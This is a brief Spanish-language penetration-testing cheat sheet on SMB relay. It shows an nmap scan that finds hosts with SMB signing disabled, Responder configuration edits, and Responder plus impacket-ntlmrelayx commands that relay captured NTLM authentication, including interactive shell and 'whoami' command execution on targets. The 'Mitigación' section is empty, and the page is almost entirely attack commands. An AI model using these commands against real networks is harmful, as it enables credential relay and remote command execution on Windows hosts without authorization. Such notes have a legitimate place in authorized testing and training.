SMB Relay
Requisitos
Identificar host con la firma SMB deshabilitada
nmap --script=smb2-security-mode.nse -p445 172.16.0.101Configuración de responder
sudo vim /etc/responder/Responder.conf; Server to start
SMB = Off
HTTP = OffEjecución del ataque
responder -I eth2 -w -d -vimpacket-ntlmrelayx -tf targets.txt -smb2support
impacket-ntlmrelayx -tf targets.txt -smb2support -i
impacket-ntlmrelayx -tf targets.txt -smb2support -c "whoami"Mitigación
Última actualización